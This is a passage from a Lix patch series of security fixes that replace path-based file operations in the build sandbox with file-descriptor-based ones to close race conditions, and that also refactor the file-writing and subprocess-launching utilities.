TEST(guessOrInventPath, symlinks) { ++ Path symlinkPath = getUnitTestDataPath("guess-or-invent/test-symlink"); ++ Path targetPath = getUnitTestDataPath("guess-or-invent/nowhere"); ++ createDirs(dirOf(symlinkPath)); ++ createSymlink(targetPath, symlinkPath); ++ AutoCloseFD symlink{open(symlinkPath.c_str(), O_PATH | O_NOFOLLOW, 0666)}; ++ testGuessOrInventPathPrePostDeletion(symlink, symlinkPath); ++ } ++ ++ TEST(guessOrInventPath, fifos) { ++ Path fifoPath = getUnitTestDataPath("guess-or-invent/fifo"); ++ createDirs(dirOf(fifoPath)); ++ ASSERT_TRUE(mkfifo(fifoPath.c_str(), 0666) == 0); ++ AutoCloseFD fifo{open(fifoPath.c_str(), O_PATH | O_NOFOLLOW, 0666)}; ++ testGuessOrInventPathPrePostDeletion(fifo, fifoPath); ++ } ++#endif ++ ++ TEST(guessOrInventPath, pipes) { ++ int pipefd[2]; ++ ++ ASSERT_TRUE(pipe(pipefd) == 0); ++ ++ AutoCloseFD pipe_read{pipefd[0]}; ++ ASSERT_TRUE(pipe_read); ++ AutoCloseFD pipe_write{pipefd[1]}; ++ ASSERT_TRUE(pipe_write); ++ ++ /* We cannot predict what the platform will return here. ++ * But it cannot fail. */ ++ ASSERT_TRUE(pipe_read.guessOrInventPath().size() >= 0); ++ ASSERT_TRUE(pipe_write.guessOrInventPath().size() >= 0); ++ pipe_write.close(); ++ ASSERT_TRUE(pipe_read.guessOrInventPath().size() >= 0); ++ pipe_read.close(); ++ } ++ ++ TEST(guessOrInventPath, sockets) { ++ Path socketPath = getUnitTestDataPath("guess-or-invent/socket"); ++ createDirs(dirOf(socketPath)); ++ AutoCloseFD socket = createUnixDomainSocket(socketPath, 0666); ++ testGuessOrInventPathPrePostDeletion(socket, socketPath); ++ } ++ + /* ---------------------------------------------------------------------------- + * concatStringsSep + * --------------------------------------------------------------------------*/ +-- +2.49.0 + + +From bcf1f27fec3b18c33e7b76384cebd95b105f9357 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:04:59 +0100 +Subject: [SECURITY FIX 02/12] libstore: open build directory as a dirfd as + well + +We now keep around a proper AutoCloseFD around the temporary directory +which we plan to use for openat operations and avoiding the build +directory being swapped out while we are doing something else. + +Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 5 +++++ + lix/libstore/build/local-derivation-goal.hh | 5 +++++ + 2 files changed, 10 insertions(+) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 5de4fdec5..fc6e925f3 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -441,6 +441,11 @@ try { + false, + 0700 + ); ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ * POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); + + chownToBuilder(tmpDir); + +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index ec874ecea..5b9051ede 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -42,6 +42,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path tmpDir; + ++ /** ++ * The temporary directory file descriptor ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +-- +2.49.0 + + +From 10509774edf5f6cae9a17ff9b656e4fb42c996f8 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:05:34 +0100 +Subject: [SECURITY FIX 03/12] libstore: chown to builder variant for file + descriptors + +We use it immediately for the build temporary directory. + +Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 9 ++++++++- + lix/libstore/build/local-derivation-goal.hh | 10 +++++++++- + 2 files changed, 17 insertions(+), 2 deletions(-) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index fc6e925f3..6d93c6841 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -447,7 +447,7 @@ try { + if (!tmpDirFd) + throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); + +- chownToBuilder(tmpDir); ++ chownToBuilder(tmpDirFd); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -931,6 +931,13 @@ void LocalDerivationGoal::chownToBuilder(const Path & path) + throw SysError("cannot change ownership of '%1%'", path); + } + ++void LocalDerivationGoal::chownToBuilder(const AutoCloseFD & fd) ++{ ++ if (!buildUser) return; ++ if (fchown(fd.get(), buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", fd.guessOrInventPath()); ++} ++ + + void LocalDerivationGoal::runChild() + { +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index 5b9051ede..eb2fe50f3 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -202,10 +202,18 @@ struct LocalDerivationGoal : public DerivationGoal + kj::Promise> writeStructuredAttrs(); + + /** +- * Make a file owned by the builder. ++ * Make a file owned by the builder addressed by its path. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(const AutoCloseFD & fd); ++ + int getChildStatus() override; + + /** +-- +2.49.0 + + +From ee8382a01253059b8680d041b860b361cbde6192 Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:06:03 +0100 +Subject: [SECURITY FIX 04/12] libutil: writeFile variant for file descriptors + +`writeFile` lose its `sync` boolean flag to make things simpler. + +A new `writeFileAndSync` function is created and all call sites are +converted to it. + +Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 +Signed-off-by: Raito Bezarius +--- + lix/libstore/local-store.cc | 4 +-- + lix/libutil/file-system.cc | 50 ++++++++++++++++++++++++++----------- + lix/libutil/file-system.hh | 22 ++++++++-------- + 3 files changed, 49 insertions(+), 27 deletions(-) + +diff --git a/lix/libstore/local-store.cc b/lix/libstore/local-store.cc +index 3d75be2f4..1d4ba8665 100644 +--- a/lix/libstore/local-store.cc ++++ b/lix/libstore/local-store.cc +@@ -224,7 +224,7 @@ void LocalStore::initDB(DBState & state) + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(state, true); +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFileAndSync(schemaPath, fmt("%1%", nixSchemaVersion), 0666); + } + + else if (curSchema < nixSchemaVersion) { +@@ -277,7 +277,7 @@ void LocalStore::initDB(DBState & state) + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFileAndSync(schemaPath, fmt("%1%", nixSchemaVersion), 0666); + + lockFile(globalLock.get(), ltRead, always_progresses); + } +diff --git a/lix/libutil/file-system.cc b/lix/libutil/file-system.cc +index 47fc2f7ba..0fe70d938 100644 +--- a/lix/libutil/file-system.cc ++++ b/lix/libutil/file-system.cc +@@ -358,28 +358,49 @@ Generator readFileSource(const Path & path) + }(std::move(fd)); + } + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync, bool allowInterrupts) ++void writeFile(const Path & path, std::string_view s, mode_t mode, bool allowInterrupts) + { + AutoCloseFD fd{open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC, mode)}; + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, s, mode, allowInterrupts); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, std::string_view s, mode_t mode, bool allowInterrupts) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s, allowInterrupts); + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", fd.guessOrInventPath()); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +-void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode) ++{ ++ writeFile(path, s, mode, false); ++} ++ ++void writeFileAndSync(const Path & path, std::string_view s, mode_t mode) + { +- writeFile(path, s, mode, sync, false); ++ { ++ AutoCloseFD fd{open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC, mode)}; ++ if (!fd) { ++ throw SysError("opening file '%1%'", path); ++ } ++ ++ writeFile(fd, s, mode); ++ fd.fsync(); ++ /* Close explicitly to ensure that exceptions are propagated. */ ++ fd.close(); ++ } ++ ++ syncParent(path); + } + + static AutoCloseFD openForWrite(const Path & path, mode_t mode) +@@ -400,7 +421,7 @@ static void closeForWrite(const Path & path, AutoCloseFD & fd, bool sync) + syncParent(path); + } + +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode) + { + AutoCloseFD fd = openForWrite(path, mode); + +@@ -417,11 +438,10 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- closeForWrite(path, fd, sync); ++ closeForWrite(path, fd, false); + } + +-kj::Promise> +-writeFile(const Path & path, AsyncInputStream & source, mode_t mode, bool sync) ++kj::Promise> writeFile(const Path & path, AsyncInputStream & source, mode_t mode) + try { + AutoCloseFD fd = openForWrite(path, mode); + +@@ -439,7 +459,7 @@ try { + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- closeForWrite(path, fd, sync); ++ closeForWrite(path, fd, false); + co_return result::success(); + } catch (...) { + co_return result::current_exception(); +diff --git a/lix/libutil/file-system.hh b/lix/libutil/file-system.hh +index 7d76b4fd0..a6267825d 100644 +--- a/lix/libutil/file-system.hh ++++ b/lix/libutil/file-system.hh +@@ -190,19 +190,21 @@ Generator readFileSource(const Path & path); + * Write a string to a file. + */ + void writeFile( +- const Path & path, +- std::string_view s, +- mode_t mode = 0666, +- bool sync = false, +- bool allowInterrupts = true +-); +-void writeFileUninterruptible( +- const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false ++ const Path & path, std::string_view s, mode_t mode = 0666, bool allowInterrupts = true + ); ++void writeFileUninterruptible(const Path & path, std::string_view s, mode_t mode = 0666); ++void writeFile(const Path & path, Source & source, mode_t mode = 0666); + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); ++void writeFile( ++ AutoCloseFD & fd, std::string_view s, mode_t mode = 0666, bool allowInterrupts = false ++); + kj::Promise> +-writeFile(const Path & path, AsyncInputStream & source, mode_t mode = 0666, bool sync = false); ++writeFile(const Path & path, AsyncInputStream & source, mode_t mode = 0666); ++ ++/** ++ * Write a string to a file and flush the file and its parents direcotry to disk. ++ */ ++void writeFileAndSync(const Path & path, std::string_view s, mode_t mode = 0666); + + /** + * Flush a file's parent directory to disk +-- +2.49.0 + + +From 8b93c4c17a7eabf7bdfd71da2bbe41454be96adb Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 01:07:47 +0100 +Subject: [SECURITY FIX 05/12] libstore: ensure that `passAsFile` is created in + the original temp dir + +This ensures that `passAsFile` data is created inside the expected +temporary build directory by `openat()` from the parent directory file +descriptor. + +This avoids a TOCTOU which is part of the attack chain of CVE-????. + +Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a +Signed-off-by: Raito Bezarius +--- + lix/libstore/build/local-derivation-goal.cc | 9 +++++++-- + 1 file changed, 7 insertions(+), 2 deletions(-) + +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 6d93c6841..c33bd8283 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -814,8 +814,13 @@ void LocalDerivationGoal::initTmpDir() { + auto hash = hashString(HashType::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(Base::Base32, false); + Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ /* TODO(jade): we should have BorrowedFD instead of OwnedFD. */ ++ AutoCloseFD passAsFileFd{openat(tmpDirFd.get(), fn.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!passAsFileFd) { ++ throw SysError("opening `passAsFile` file in the sandbox '%1%'", p); ++ } ++ writeFile(passAsFileFd, rewriteStrings(i.second, inputRewrites)); ++ chownToBuilder(passAsFileFd); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +-- +2.49.0 + + +From d092cfa499fad3c661c7f07d2b5e0150b936db8e Mon Sep 17 00:00:00 2001 +From: Raito Bezarius +Date: Wed, 26 Mar 2025 12:42:55 +0100 +Subject: [SECURITY FIX 06/12] libutil: ensure that `_deletePath` does NOT use + absolute paths with dirfds + +When calling `_deletePath` with a parent file descriptor, `openat` is +made effective by using relative paths to the directory file descriptor. + +To avoid the problem, the signature is changed to resist misuse with an +assert in the prologue of the function. + +Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 +Signed-off-by: Raito Bezarius +--- + lix/libutil/file-system.cc | 36 ++++++++++++++++++++++++------------ + 1 file changed, 24 insertions(+), 12 deletions(-) + +diff --git a/lix/libutil/file-system.cc b/lix/libutil/file-system.cc +index 0fe70d938..1b71caeb1 100644 +--- a/lix/libutil/file-system.cc ++++ b/lix/libutil/file-system.cc +@@ -473,18 +473,29 @@ void syncParent(const Path & path) + fd.fsync(); + } + +-static void _deletePath(int parentfd, const Path & path, uint64_t & bytesFreed, bool interruptible) ++/* TODO(horrors): a better structure that links all parent fds for the traversal root ++ * should be considered for this code ++ */ ++static void _deletePath(int parentfd, const std::string & name, uint64_t & bytesFreed, bool interruptible) + { ++ /* This ensures that `name` is an immediate child of `parentfd`. */ ++ assert(!name.empty() && name.find('/') == std::string::npos && "`name` is an immediate child to `parentfd`"); ++ + if (interruptible) { + checkInterrupt(); + } + +- std::string name(baseNameOf(path)); ++ /* FIXME(horrors): there's a minor TOCTOU here. ++ * we fstatat the inode nofollow, check if this is a directory ++ * and then open it. ++ * a better alternative is open it as O_PATH as a namefd. ++ * if it's a directory, it can be openat with the namefd. ++ */ + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, AT_SYMLINK_NOFOLLOW) == -1) { + if (errno == ENOENT) return; +- throw SysError("getting status of '%1%'", path); ++ throw SysError("getting status of '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + } + + if (!S_ISDIR(st.st_mode)) { +@@ -515,24 +526,25 @@ static void _deletePath(int parentfd, const Path & path, uint64_t & bytesFreed, + /* Make the directory accessible. */ + const auto PERM_MASK = S_IRUSR | S_IWUSR | S_IXUSR; + if ((st.st_mode & PERM_MASK) != PERM_MASK) { +- if (fchmodat(parentfd, name.c_str(), st.st_mode | PERM_MASK, 0) == -1) +- throw SysError("chmod '%1%'", path); ++ if (fchmodat(parentfd, name.c_str(), st.st_mode | PERM_MASK, 0) == -1) { ++ throw SysError("chmod '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); ++ } + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + AutoCloseDir dir(fdopendir(fd)); + if (!dir) +- throw SysError("opening directory '%1%'", path); +- for (auto & i : readDirectory(dir.get(), path, interruptible)) +- _deletePath(dirfd(dir.get()), path + "/" + i.name, bytesFreed, interruptible); ++ throw SysError("opening directory '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); ++ for (auto & i : readDirectory(dir.get(), name, interruptible)) ++ _deletePath(dirfd(dir.get()), i.name, bytesFreed, interruptible); + } + + int flags = S_ISDIR(st.st_mode) ? AT_REMOVEDIR : 0; + if (unlinkat(parentfd, name.c_str(), flags) == -1) { + if (errno == ENOENT) return; +- throw SysError("cannot unlink '%1%'", path); ++ throw SysError("cannot unlink '%1%' in directory '%2%'", name, guessOrInventPathFromFD(parentfd)); + } + } + +@@ -548,7 +560,7 @@ static void _deletePath(const Path & path, uint64_t & bytesFreed, bool interrupt + throw SysError("opening directory '%1%'", path); + } + +- _deletePath(dirfd.get(), path, bytesFreed, interruptible); ++ _deletePath(dirfd.get(), std::string(baseNameOf(path)), bytesFreed, interruptible); + } + + +-- +2.49.0 + + +From 500a7406a0f6fe2d9132da70d10688cfc7fa598d Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Mon, 17 Mar 2025 15:45:27 +0100 +Subject: [SECURITY FIX 07/12] libutil: make RunningProgram more useful + +make it moveable, make it killable, and add a stdout fd accessor. + +Change-Id: I2387cbe8ac67b899a322cd6c7d306ef9ea7abcd0 +--- + lix/libcmd/repl.cc | 4 ++-- + lix/libfetchers/git.cc | 2 +- + lix/libstore/build/derivation-goal.cc | 2 +- + lix/libutil/processes.cc | 19 +++++++++++++++++-- + lix/libutil/processes.hh | 16 +++++++++++++++- + 5 files changed, 36 insertions(+), 7 deletions(-) + +diff --git a/lix/libcmd/repl.cc b/lix/libcmd/repl.cc +index 50ce1cd3a..5afebea93 100644 +--- a/lix/libcmd/repl.cc ++++ b/lix/libcmd/repl.cc +@@ -254,7 +254,7 @@ void runNix(Path program, const Strings & args) + .program = settings.nixBinDir+ "/" + program, + .args = args, + .environment = subprocessEnv, +- }).wait(); ++ }).waitAndCheck(); + + return; + } +@@ -672,7 +672,7 @@ ProcessLineResult NixRepl::processLine(std::string line) + + // runProgram redirects stdout to a StringSink, + // using runProgram2 to allow editors to display their UI +- runProgram2(RunOptions { .program = editor, .searchPath = true, .args = args }).wait(); ++ runProgram2(RunOptions { .program = editor, .searchPath = true, .args = args }).waitAndCheck(); + + // Reload right after exiting the editor if path is not in store + // Store is immutable, so there could be no changes, so there's no need to reload +diff --git a/lix/libfetchers/git.cc b/lix/libfetchers/git.cc +index b44ea997a..3231ec011 100644 +--- a/lix/libfetchers/git.cc ++++ b/lix/libfetchers/git.cc +@@ -777,7 +777,7 @@ struct GitInputScheme : InputScheme + .args = { "-C", repoDir, "--git-dir", gitDir, "archive", input.getRev()->gitRev() }, + .captureStdout = true, + }); +- Finally const _wait([&] { proc.wait(); }); ++ Finally const _wait([&] { proc.waitAndCheck(); }); + + unpackTarfile(*proc.getStdout(), tmpDir); + } +diff --git a/lix/libstore/build/derivation-goal.cc b/lix/libstore/build/derivation-goal.cc +index 6767bc37e..69e654490 100644 +--- a/lix/libstore/build/derivation-goal.cc ++++ b/lix/libstore/build/derivation-goal.cc +@@ -895,7 +895,7 @@ void runPostBuildHook( + }); + Finally const _wait([&] { + try { +- proc.wait(); ++ proc.waitAndCheck(); + } catch (nix::Error & e) { + e.addTrace(nullptr, + "while running the post-build-hook %s for derivation %s", +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index e2cc2515b..6b24d943f 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -249,7 +249,7 @@ std::pair runProgram(RunOptions && options) + + try { + auto proc = runProgram2(options); +- Finally const _wait([&] { proc.wait(); }); ++ Finally const _wait([&] { proc.waitAndCheck(); }); + stdout = proc.getStdout()->drain(); + } catch (ExecError & e) { + status = e.status; +@@ -277,7 +277,22 @@ RunningProgram::~RunningProgram() + } + } + +-void RunningProgram::wait() ++std::tuple, int> RunningProgram::release() ++{ ++ return {pid.release(), std::move(stdoutSource), stdout_.release()}; ++} ++ ++int RunningProgram::kill() ++{ ++ return pid.kill(); ++} ++ ++int RunningProgram::wait() ++{ ++ return pid.wait(); ++} ++ ++void RunningProgram::waitAndCheck() + { + if (std::uncaught_exceptions() == 0) { + int status = pid.wait(); +diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh +index e9e4eb15a..01c42b9fc 100644 +--- a/lix/libutil/processes.hh ++++ b/lix/libutil/processes.hh +@@ -102,9 +102,23 @@ private: + + public: + RunningProgram() = default; ++ RunningProgram(RunningProgram &&) = default; ++ RunningProgram & operator=(RunningProgram &&) = default; + ~RunningProgram(); + +- void wait(); ++ explicit operator bool() const { return bool(pid); } ++ ++ std::tuple, int> release(); ++ ++ int kill(); ++ [[nodiscard]] ++ int wait(); ++ void waitAndCheck(); ++ ++ std::optional getStdoutFD() const ++ { ++ return stdout_ ? std::optional(stdout_.get()) : std::nullopt; ++ } + + Source * getStdout() const { return stdoutSource.get(); }; + }; +-- +2.49.0 + + +From 7f127054bec18da811bf3364909870f7a54f6b8d Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Mon, 17 Mar 2025 15:45:27 +0100 +Subject: [SECURITY FIX 08/12] libutil: add generic redirections runProgram2 + +explicit stderr redirection makes mergeStderrToStdout unnecessary also. + +Change-Id: I63de929e6dc53f6c5ceb2d43c2ce288bfc04d872 +--- + lix/libfetchers/git.cc | 23 +++++++++++++++++------ + lix/libstore/build/derivation-goal.cc | 2 +- + lix/libstore/globals.cc | 12 ++++++++++-- + lix/libstore/ssh.cc | 1 + + lix/libutil/processes.cc | 8 +++++--- + lix/libutil/processes.hh | 7 ++++++- + 6 files changed, 40 insertions(+), 13 deletions(-) + +diff --git a/lix/libfetchers/git.cc b/lix/libfetchers/git.cc +index 3231ec011..aa3ef7150 100644 +--- a/lix/libfetchers/git.cc ++++ b/lix/libfetchers/git.cc +@@ -22,6 +22,7 @@ + #include + #include + #include ++#include + + using namespace std::string_literals; + +@@ -164,11 +165,19 @@ WorkdirInfo getWorkdirInfo(const Input & input, const Path & workdir) + + /* Check whether HEAD points to something that looks like a commit, + since that is the refrence we want to use later on. */ +- auto result = runProgram(RunOptions { ++ auto result = runProgram(RunOptions{ + .program = "git", +- .args = { "-C", workdir, "--git-dir", gitDir, "rev-parse", "--verify", "--no-revs", "HEAD^{commit}" }, ++ .args = ++ {"-C", ++ workdir, ++ "--git-dir", ++ gitDir, ++ "rev-parse", ++ "--verify", ++ "--no-revs", ++ "HEAD^{commit}"}, + .environment = env, +- .mergeStderrToStdout = true ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + auto exitCode = WEXITSTATUS(result.first); + auto errorMessage = result.second; +@@ -709,10 +718,12 @@ struct GitInputScheme : InputScheme + AutoDelete delTmpDir(tmpDir, true); + PathFilter filter = defaultPathFilter; + +- auto result = runProgram(RunOptions { ++ auto result = runProgram(RunOptions{ + .program = "git", +- .args = { "-C", repoDir, "--git-dir", gitDir, "cat-file", "commit", input.getRev()->gitRev() }, +- .mergeStderrToStdout = true ++ .args = ++ {"-C", repoDir, "--git-dir", gitDir, "cat-file", "commit", input.getRev()->gitRev() ++ }, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + if (WEXITSTATUS(result.first) == 128 + && result.second.find("bad file") != std::string::npos) +diff --git a/lix/libstore/build/derivation-goal.cc b/lix/libstore/build/derivation-goal.cc +index 69e654490..48d38ffb4 100644 +--- a/lix/libstore/build/derivation-goal.cc ++++ b/lix/libstore/build/derivation-goal.cc +@@ -891,7 +891,7 @@ void runPostBuildHook( + .program = settings.postBuildHook, + .environment = hookEnvironment, + .captureStdout = true, +- .mergeStderrToStdout = true, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}}, + }); + Finally const _wait([&] { + try { +diff --git a/lix/libstore/globals.cc b/lix/libstore/globals.cc +index 9221da32b..b4328b068 100644 +--- a/lix/libstore/globals.cc ++++ b/lix/libstore/globals.cc +@@ -242,9 +242,17 @@ StringSet Settings::getDefaultExtraPlatforms() + // machines. Note that we can’t force processes from executing + // x86_64 in aarch64 environments or vice versa since they can + // always exec with their own binary preferences. +- if (std::string{SYSTEM} == "aarch64-darwin" && +- runProgram(RunOptions {.program = "arch", .args = {"-arch", "x86_64", "/usr/bin/true"}, .mergeStderrToStdout = true}).first == 0) ++ if (std::string{SYSTEM} == "aarch64-darwin" ++ && runProgram(RunOptions{ ++ .program = "arch", ++ .args = {"-arch", "x86_64", "/usr/bin/true"}, ++ .redirections = {{.from = STDERR_FILENO, .to = STDOUT_FILENO}} ++ } ++ ).first ++ == 0) ++ { + extraPlatforms.insert("x86_64-darwin"); ++ } + #endif + + return extraPlatforms; +diff --git a/lix/libstore/ssh.cc b/lix/libstore/ssh.cc +index b43cc50a9..2b329f231 100644 +--- a/lix/libstore/ssh.cc ++++ b/lix/libstore/ssh.cc +@@ -8,6 +8,7 @@ + #include "lix/libutil/strings.hh" + #include "lix/libstore/temporary-dir.hh" + #include ++#include + + namespace nix { + +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index 6b24d943f..0dcd96ba9 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -330,9 +330,11 @@ RunningProgram runProgram2(const RunOptions & options) + replaceEnv(*options.environment); + if (options.captureStdout && dup2(out.writeSide.get(), STDOUT_FILENO) == -1) + throw SysError("dupping stdout"); +- if (options.mergeStderrToStdout) +- if (dup2(STDOUT_FILENO, STDERR_FILENO) == -1) +- throw SysError("cannot dup stdout into stderr"); ++ for (auto redirection : options.redirections) { ++ if (dup2(redirection.to, redirection.from) == -1) { ++ throw SysError("dupping fd %i to %i", redirection.from, redirection.to); ++ } ++ } + + if (options.chdir && chdir((*options.chdir).c_str()) == -1) + throw SysError("chdir failed"); +diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh +index 01c42b9fc..3311b8fb8 100644 +--- a/lix/libutil/processes.hh ++++ b/lix/libutil/processes.hh +@@ -76,6 +76,11 @@ std::string runProgram(Path program, bool searchPath = false, + + struct RunOptions + { ++ struct Redirection ++ { ++ int from, to; ++ }; ++ + Path program; + bool searchPath = true; + Strings args = {}; +@@ -84,8 +89,8 @@ struct RunOptions + std::optional chdir = {}; + std::optional> environment = {}; + bool captureStdout = false; +- bool mergeStderrToStdout = false; + bool isInteractive = false; ++ std::vector redirections; + }; + + struct [[nodiscard("you must call RunningProgram::wait()")]] RunningProgram +-- +2.49.0 + + +From 582f775ac358f9da682f707a3f58f228f7fdaed8 Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Fri, 28 Mar 2025 23:16:01 +0100 +Subject: [SECURITY FIX 09/12] libutil: add capability support to runProgram2 + +launching pasta to not run as root will ambient require capabilities. + +Change-Id: I1dd2506a1fa3944a9d9062123ef8a74903c597ea +--- + lix/libutil/processes.cc | 47 ++++++++++++++++++++++++++++++++++++++++ + lix/libutil/processes.hh | 3 +++ + 2 files changed, 50 insertions(+) + +diff --git a/lix/libutil/processes.cc b/lix/libutil/processes.cc +index 0dcd96ba9..2f214e552 100644 +--- a/lix/libutil/processes.cc ++++ b/lix/libutil/processes.cc +@@ -22,6 +22,7 @@ + #endif + + #ifdef __linux__ ++# include + # include + # include + #endif +@@ -338,6 +339,13 @@ RunningProgram runProgram2(const RunOptions & options) + + if (options.chdir && chdir((*options.chdir).c_str()) == -1) + throw SysError("chdir failed"); ++ ++#if __linux__ ++ if (!options.caps.empty() && prctl(PR_SET_KEEPCAPS, 1) < 0) { ++ throw SysError("setting keep-caps failed"); ++ } ++#endif ++ + if (options.gid && setgid(*options.gid) == -1) + throw SysError("setgid failed"); + /* Drop all other groups if we're setgid. */ +@@ -346,6 +354,45 @@ RunningProgram runProgram2(const RunOptions & options) + if (options.uid && setuid(*options.uid) == -1) + throw SysError("setuid failed"); + ++#if __linux__ ++ if (!options.caps.empty()) { ++ if (prctl(PR_SET_KEEPCAPS, 0)) { ++ throw SysError("clearing keep-caps failed"); ++ } ++ ++ // we do the capability dance like this to avoid a dependency ++ // on libcap, which has a rather large build closure and many ++ // more features that we need for now. maybe some other time. ++ static constexpr uint32_t LINUX_CAPABILITY_VERSION_3 = 0x20080522; ++ static constexpr uint32_t LINUX_CAPABILITY_U32S_3 = 2; ++ struct user_cap_header_struct ++ { ++ uint32_t version; ++ int pid; ++ } hdr = {LINUX_CAPABILITY_VERSION_3, 0}; ++ struct user_cap_data_struct ++ { ++ uint32_t effective; ++ uint32_t permitted; ++ uint32_t inheritable; ++ } data[LINUX_CAPABILITY_U32S_3] = {}; ++ for (auto cap : options.caps) { ++ assert(cap / 32 < LINUX_CAPABILITY_U32S_3); ++ data[cap / 32].permitted |= 1 << (cap % 32); ++ data[cap / 32].inheritable |= 1 << (cap % 32); ++ } ++ if (syscall(SYS_capset, &hdr, data)) { ++ throw SysError("couldn't set capabilities"); ++ } ++ ++ for (auto cap : options.caps) { ++ if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0) < 0) { ++ throw SysError("couldn't set ambient caps"); ++ } ++ } ++ } ++#endif ++ + Strings args_(options.args); + args_.push_front(options.program); + +diff --git a/lix/libutil/processes.hh b/lix/libutil/processes.hh +index 3311b8fb8..6ca7f3bdf 